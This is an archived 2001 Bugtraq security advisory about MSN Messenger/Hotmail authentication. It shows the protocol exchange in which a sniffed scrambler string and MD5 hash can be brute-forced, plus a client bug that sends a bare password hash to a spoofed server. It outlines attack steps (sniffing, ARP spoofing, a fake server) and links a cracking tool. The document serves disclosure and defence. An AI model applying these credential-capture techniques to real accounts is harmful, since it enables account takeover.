[21412] in bugtraq
Messenger/Hotmail passwords at risk
daemon@ATHENA.MIT.EDU (gregory duchemin)
Mon Jul 9 15:11:02 2001
From: "gregory duchemin" <c3rb3r@hotmail.com>
To: BUGTRAQ@securityfocus.com
Date: Fri, 06 Jul 2001 21:32:36 -0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F7416xsoIIzQtO9vXLs000040f6@hotmail.com>
hi bugtraqers,
Background
==========
i sent the following advisory to Microsoft there is about 1 month of that,
and since i did not get any reply.
The problem described below is still working on the latest MSN client
version currently available.
A bug in the Hotmail Messenger cryptographic system may allow the recovery
of millions of hotmail mailboxes's password.
Microsoft MSN messenger is a very handy little win32 application designed to
keep in touch with friends, family, collaborators
around the world.
It offers many nice features like real time chats, hotmail mailbox access,
etc...
Messenger runs with its own protocol to communicate with a bunch of
Microsoft dedicated servers and authenticate itself with the
same password than hotmail is using (through the global passport system).
The password is not sent clearly on the wire but hashed with MD5 in the
following manner:
Authentication Scheme
=====================
while negociating a connection with a remote Microsoft server, msn clients
clearly send the target user mailbox
to be authenticated with (basically the username) and get back a scrambler
string to be prepend to the password before hashing it
and sending it.
client ----- VER xx MSNP5 MSNP4 CVR0 ---------------> MSN server
client <---- VER xx MSNP5 MSNP4 CVR0 --------------- MSN server
client ----- INF (xx+1) ----------------------------> MSN server
client <---- INF (xx+1) MD5 ------------------------ MSN server
client ----- USR (xx+2) MD5 I ----------------------> MSN server
client <---- USR (xx+2) MD5 S yyyyyyyyy.yyyyyyyyy -- MSN server (the
scrambler string is actually made with seconds.microseconds)
client ----- USR (xx+3) MD5 S xxxxx...(32 chars) ---> MSN server
here it is, the password hash has been sent and may be easily broken by
bruteforcing it.
the hash creation process is as follow:
======================================
say user toto has a password "titan"
then his client generate the string "yyyyyyyyy.yyyyyyyyytitan" and the
according MD5 hash, say xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
the client send MD5(yyyyyyyyy.yyyyyyyyytitan) on the wire.
Problem
=======
by sniffing the wire, a malicious user can obviously retrieve the scrambler
string and the final hash.
then he can start a bruteforce session trying all password combinaisons with
the same scrambler prepended and comparing the resulting
hash with this he previously sniffed. (an exhaustive attack)
Basically, without any bug, messenger is already vulnerable because of the
weak cryptographic scheme it uses.
Exploit
=======
I wrote, with the great help of Simeon Pilgrim, a very fast MD5 bruteforcer
designed to use scrambler strings
to finally retrieve an original password for a given MD5 hash.
Currently it takes only 12 days to exhaust all 8 chars length passwords in
the charset [a-z0-9] with an average speed of
2 600 000 hashes sec with only one 1 Ghz athlon processor. (i considere to
be able to test up to 4 000 000 hashes/sec with the next release
and one 1.3 Ghz processor)
Win32/Unix versions are freely available at http://mdcrack.multimania.com
Problem 2
=========
Another important point is that, if nowadays users can't actually choose a
new password lesser than 8 chars length,
all old and weak passwords (from 1 to 7 chars) are still in use and just
works perfectly with MSN.
How many users are currently at risk ? too much for my fingers i bet.
Problem 3
=========
The last point is a nasty bug in the client implementation that allow a
malicious user, spoofing the MSN server, to send a (NULL) scrambler string
In such a case and intead of simply closing the connection, the client send
the mere password hash making things even
faster for a further bruteforce attack.
client <---- USR (xx+2) MD5 S ---------------------- fake MSN server
client ----- USR (xx+3) MD5 S xxxxx...(32 chars) ---> fake MSN server
where xxxx...(32 chars) is actually MD5(password).
Note that if this technic is still stealthy, it may need, in some network
topologies, the use of icmp redirect/ arp spoofing to redirect all the flow
to
the attacker machine inside a given network.
But this kind of attacks are well known by networks crackers.
Note that all communications between clients and servers are in a clear
form, and by the way, many other identity robbery attacks remain available
for instance, when our victim is asking messenger to open his mailbox, the
malicious user may send another URL to the client like a spoofing site with
a false hotmail relogging page.
Conclusion
==========
Because hotmail and MSN are using the same authentication system called
passport, compromising users MSN account is finally the same trick than
compromising hotmail users mailbox.
A malicious user with a freshly hacked MSN password can use it either with
messenger or with www.hotmail.com
Because a tremendous number of people are using these services without
taking too much care about their password strongness, the number of
potential victims is really great.
The attack described above can be released from any place in the path
between the victim and MSN servers or simply in the same network,
this is the mere prerequisite.
Choose a quite strong password (at least 9 chars length with a good charset)
and change it as regularly as possible.
Finally, never never trust hotmail and any other web based free accounts for
you very own mails.
========
Gregory Duchemin
Security Consultant
NEUROCOM CANADA
1001 Bd Maisonneuve Ouest, Suite 200
Montreal Quebec
H3A 3C8 Canada
phone: 514 908 6800
Email: gdn@neurocom.com
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
